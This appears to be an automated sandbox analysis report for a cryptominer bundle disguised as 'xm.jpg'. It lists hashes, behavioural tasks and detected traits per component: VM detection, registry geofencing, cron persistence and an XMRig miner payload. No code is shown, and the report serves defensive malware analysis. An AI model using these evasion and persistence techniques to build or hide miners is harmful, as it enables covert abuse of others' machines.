Overview
overview
10Static
static
10xm.gz
windows7-x64
3xm.gz
windows10-2004-x64
7sample.tar
windows7-x64
3sample.tar
windows10-2004-x64
7aarch64
ubuntu-18.04-amd64
6create
ubuntu-18.04-amd64
7create
debian-9-armhf
7create
debian-9-mips
1create
debian-9-mipsel
1hide
ubuntu-18.04-amd64
1hide.c
windows7-x64
3hide.c
windows10-2004-x64
3init
ubuntu-18.04-amd64
3mining
ubuntu-18.04-amd64
6mining
debian-9-armhf
6mining
debian-9-mips
6mining
debian-9-mipsel
6mkcfg
ubuntu-18.04-amd64
1mkcfg
debian-9-armhf
1mkcfg
debian-9-mips
1mkcfg
debian-9-mipsel
1start
ubuntu-18.04-amd64
10start
debian-9-armhf
1start
debian-9-mips
1start
debian-9-mipsel
1x86_64
ubuntu-18.04-amd64
6General
-
Target
xm.jpg
-
Size
3.9MB
-
Sample
231220-fzvkeageb9
-
MD5
1371a2ca243dc0cd5fae198d69f44708
-
SHA1
f7921b63d2b3f7587f192a5708e339e6a9b1f2f6
-
SHA256
13607684da4fc4c2493996ff4ffe2347a806cb13b905d97bec815d5bf33824da
-
SHA512
84aa7f461c8ebcdd5434f6be119217b9a51ea08c46b0b1ae1e9f0f4081dd77364c552beab8511719b8727972c46c25ab8769faccd65f8b21d6d591ee7a7d4b13
-
SSDEEP
98304:EtPSdi6EM62kXoADzDtDSyKSgXBesozngrcLFoZYWjiDRUPGD:EtFMXQoAf5DNgXksoPFoC+idvD
Behavioral task
behavioral1
Sample
xm.gz
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
xm.gz
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
sample.tar
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
sample.tar
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
aarch64
Resource
ubuntu1804-amd64-20231215-en
Behavioral task
behavioral6
Sample
create
Resource
ubuntu1804-amd64-20231215-en
Behavioral task
behavioral7
Sample
create
Resource
debian9-armhf-20231215-en
Behavioral task
behavioral8
Sample
create
Resource
debian9-mipsbe-20231215-en
Behavioral task
behavioral9
Sample
create
Resource
debian9-mipsel-20231215-en
Behavioral task
behavioral10
Sample
hide
Resource
ubuntu1804-amd64-20231215-en
Behavioral task
behavioral11
Sample
hide.c
Resource
win7-20231129-en
Behavioral task
behavioral12
Sample
hide.c
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
init
Resource
ubuntu1804-amd64-20231215-en
Behavioral task
behavioral14
Sample
mining
Resource
ubuntu1804-amd64-20231215-en
Behavioral task
behavioral15
Sample
mining
Resource
debian9-armhf-20231215-en
Behavioral task
behavioral16
Sample
mining
Resource
debian9-mipsbe-20231215-en
Behavioral task
behavioral17
Sample
mining
Resource
debian9-mipsel-20231215-en
Behavioral task
behavioral18
Sample
mkcfg
Resource
ubuntu1804-amd64-20231215-en
Behavioral task
behavioral19
Sample
mkcfg
Resource
debian9-armhf-20231215-en
Behavioral task
behavioral20
Sample
mkcfg
Resource
debian9-mipsbe-20231215-en
Behavioral task
behavioral21
Sample
mkcfg
Resource
debian9-mipsel-20231215-en
Behavioral task
behavioral22
Sample
start
Resource
ubuntu1804-amd64-20231215-en
Behavioral task
behavioral23
Sample
start
Resource
debian9-armhf-20231215-en
Behavioral task
behavioral24
Sample
start
Resource
debian9-mipsbe-20231215-en
Behavioral task
behavioral25
Sample
start
Resource
debian9-mipsel-20231215-en
Behavioral task
behavioral26
Sample
x86_64
Resource
ubuntu1804-amd64-20231215-en
Malware Config
Targets
-
-
Target
xm.jpg
-
Size
3.9MB
-
MD5
1371a2ca243dc0cd5fae198d69f44708
-
SHA1
f7921b63d2b3f7587f192a5708e339e6a9b1f2f6
-
SHA256
13607684da4fc4c2493996ff4ffe2347a806cb13b905d97bec815d5bf33824da
-
SHA512
84aa7f461c8ebcdd5434f6be119217b9a51ea08c46b0b1ae1e9f0f4081dd77364c552beab8511719b8727972c46c25ab8769faccd65f8b21d6d591ee7a7d4b13
-
SSDEEP
98304:EtPSdi6EM62kXoADzDtDSyKSgXBesozngrcLFoZYWjiDRUPGD:EtFMXQoAf5DNgXksoPFoC+idvD
Score7/10-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
-
-
Target
sample
-
Size
9.2MB
-
MD5
1c0e4eed997020aa05e6b2c107a169ae
-
SHA1
aaaec2f2e3dcbb7cd00bcc197d6e432dde4ae88e
-
SHA256
9aec808e1209de34afa1659dcfcd5cd218076f53dee7959388a377ab0625ef06
-
SHA512
ac18e8976fb583292386841c3cc313e11436fba810ca16b69524949f37a1e3df05093ffb9592ad07638b39e9f94941b5f9cca49828d7d09ca3ec7e194e860774
-
SSDEEP
196608:mYK2IZ79KzcDPdUGZuhXDYK2IZ79KzcDPdUGZuhX:mYX6kStyzYX6kSty
Score7/10-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
-
-
Target
aarch64
-
Size
4.6MB
-
MD5
1ba3f6f197a8ddd84cf30e29eed01ae9
-
SHA1
e63b06246de680ac8357fb2d2fb467c630b85dd2
-
SHA256
bbcdffd6fa3b1370dfc091bfd3bfca38be013f72f94af7ef29466d911c9604d8
-
SHA512
818f671bbe14e3b863511fc13fd83bf30fdf6c89240431d96b4d85105d99552c16f3e90ff52f90ce2e1cb3a14df37be6f99203eeb24ff0327245987d3ebeb3a3
-
SSDEEP
98304:0ALYK2IB3zOA9/iPkI0p8C7vJxdUGZ2KS55rZhhWI4:HYK2IZ79KzcDPdUGZuhX
Score6/10-
Checks CPU configuration
Checks CPU information which indicate if the system is a virtual machine.
-
Checks hardware identifiers (DMI)
Checks DMI information which indicate if the system is a virtual machine.
-
Reads CPU attributes
-
Reads hardware information
Accesses system info like serial numbers, manufacturer names etc.
-
-
-
Target
create
-
Size
669B
-
MD5
18d2b80638dc8ed90e86c7caf316fe43
-
SHA1
887f50f37a7e57abd113153becd5d8e36a780b19
-
SHA256
d6a88499031026e3216ac733dd5b6365d597fa91599d33ec10a65cbb72e229b8
-
SHA512
1ab557c50377097f1b4f59bacea66de1b569ea8e341d47155919d2996157f71e078e3a4b474ef005c7320e4eb46199fdda01dcffe5df6973778059466c0f2cec
Score7/10-
Executes dropped EXE
-
Creates/modifies Cron job
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes
-
-
-
Target
hide
-
Size
17KB
-
MD5
0bb4618c041fdb18c2e115b65bc5401f
-
SHA1
d9d039df279c4cdcceba347630a5fbdd296fca22
-
SHA256
3f1e584ca9393a3f635d8a8573e5b7f863df0dc092911de03bffc2d4ab4f8b53
-
SHA512
7dfc744f8aa5d571db704a56d6f5d5bda4b1889b1829a1cdbcc0272d059dc9fa1d2055e56c47ffb39851f175bbde41a6b137a1175cb7ad06eb64c601302538cf
-
SSDEEP
192:RlEw1ktJKd7q6GIc1Ut4o3W4Ijl1LwxOXE/NabtULSi:fk+7TScIDD
Score1/10 -
-
-
Target
hide.c
-
Size
8KB
-
MD5
0ea36d63bdc19596106ffab97991e916
-
SHA1
3f0884d86a24ae678ea6e4f13a3f1dc1aced8a0d
-
SHA256
b1f5032c0abab0e185b90a5cacaecd6af2d10974ea2a8f9676732413bcff1424
-
SHA512
2decede4480cdd408bb37d7a82f229ce4c51923690f91ddbb7dc2e5faf17aad50d083a439ec05e021e0309bf845354146dc3aa50c7845c55fedaedab0fa78912
-
SSDEEP
96:ViUsLKDZd6ubi/9L4PLMtNuJ7tS8/Xjfo5:ViULD9i/duQY/XM5
Score3/10 -
-
-
Target
init
-
Size
41KB
-
MD5
3d7964550b662754985bae37e0ee427b
-
SHA1
3de28ccabe03f53cc4f534c96337ece4878d7a0e
-
SHA256
03fab42e0825e6c35b803a125d63191dcf819f48bc9152180379b6c598632075
-
SHA512
75849f318fa46c8415fac9bded6b0bcecc2762cbb3b2c63d0d27794bfaaf8803fff3b67919758a2b7d534f30ea0a4010e828615a09d64f562820e111b00ea7c3
-
SSDEEP
768:SKRCujM9DdD7jBnNNfVQxsRq0e0t7KzPhfs4dckgPQMSaMyOB7jVCRPlNpiKVvI:SKRnKhjBNxVQxsRq0e0t7KzPhfs4dckc
Score3/10 -
-
-
Target
mining
-
Size
355B
-
MD5
8674ce902ffedf49ae4be47baabcc2c0
-
SHA1
441ecd5d3a928125e10a0b6b19f7eed31cfd4476
-
SHA256
8f93a7dd12dbd84749cb5cf675cd8371bd732655a8d048f269d8e88e8136e2e3
-
SHA512
8428b05454cc9a6ccc3ddea862d9f38b6f10f542ebf6f784b2f7027a985f1adc9bf7c69d3306b6d4d1896af9ec8e7fe1e1d9291c60652c46d7e5126a2d2e3380
Score6/10-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes
-
-
-
Target
mkcfg
-
Size
2KB
-
MD5
b586844bb52809b9dd6c5982347e27e0
-
SHA1
1aa9693db7bd01099d3022c5d697b601a938e205
-
SHA256
a86693407c7ec7a73e1f0e39ae7727f8bdbbc690cbaedeb3817f04cb9f87a57c
-
SHA512
2a3c4031b987178e8b93ced37794d2b2803ffb595b431f05b25793fd4874d8059d9499b8c00ca5abeb7524bba3c4d23a3a5cf2091a811c79224803f7a5f440f0
Score1/10 -
-
-
Target
start
-
Size
176B
-
MD5
fe2ac6ae76a359f127213790c460496f
-
SHA1
df036a0088e1f418cb6e618fae06cf6282e79452
-
SHA256
0f1e5ab87d39835c6c28f242e68f7855a57813ef8e3e07091eee4f4d4f7ef78d
-
SHA512
8e41371af2cca37fff463fa1fff44db1cb462c8bf65f93f0ba0779adcfb4c812e411baf00bd67a2e7c92ddb27d65894bb18e205d6ca0e588c81219ba1b272889
-
XMRig Miner payload
-
-
-
Target
x86_64
-
Size
4.6MB
-
MD5
1ba3f6f197a8ddd84cf30e29eed01ae9
-
SHA1
e63b06246de680ac8357fb2d2fb467c630b85dd2
-
SHA256
bbcdffd6fa3b1370dfc091bfd3bfca38be013f72f94af7ef29466d911c9604d8
-
SHA512
818f671bbe14e3b863511fc13fd83bf30fdf6c89240431d96b4d85105d99552c16f3e90ff52f90ce2e1cb3a14df37be6f99203eeb24ff0327245987d3ebeb3a3
-
SSDEEP
98304:0ALYK2IB3zOA9/iPkI0p8C7vJxdUGZ2KS55rZhhWI4:HYK2IZ79KzcDPdUGZuhX
Score6/10-
Checks CPU configuration
Checks CPU information which indicate if the system is a virtual machine.
-
Checks hardware identifiers (DMI)
Checks DMI information which indicate if the system is a virtual machine.
-
Reads CPU attributes
-
Reads hardware information
Accesses system info like serial numbers, manufacturer names etc.
-